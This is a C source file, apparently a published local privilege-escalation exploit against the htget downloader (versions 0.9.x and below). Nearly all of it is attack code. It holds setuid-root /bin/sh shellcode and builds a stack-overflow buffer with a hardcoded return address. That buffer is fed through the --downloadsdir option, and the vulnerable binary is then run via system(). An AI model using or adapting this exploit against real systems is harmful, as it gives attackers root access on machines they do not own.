htget 0.9.x and below local root sploit.
5399850df8e0ceecf6000ec907c6faff3b8ab9f7a58340f19d5a40572aa50f18
/*
htget <= 0.9.x local r00t sploit
by
Darkeagle
htget default in: Debian, Red Hat
(c) darkeagle
*/
#include <stdio.h>
#include <string.h>
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh"; // setuid(0); and exec(/bin/sh) code
int main(int argc, char *argv[])
{
long RET;
char *path;
char buf[14000], cmd[14000];
if ( argc < 2 ) { printf("HTGET <= 0.9.x local lame r00t exploit by darkeagle\n\n"); printf("usage: %s <path>\n", argv[0]); exit(0); }
path = argv[1];
RET = 0xbfffc240; // mandrake 10.0 OR
memset(buf, 0x00, sizeof(buf));
memset(buf, 0x43, 10000);
sprintf(buf+10000, "%s", shellcode);
*(long*)&buf[8988] = RET;
sprintf(cmd, "%s --downloadsdir=%s http://unl0ck.org", path, buf);
system(cmd);
}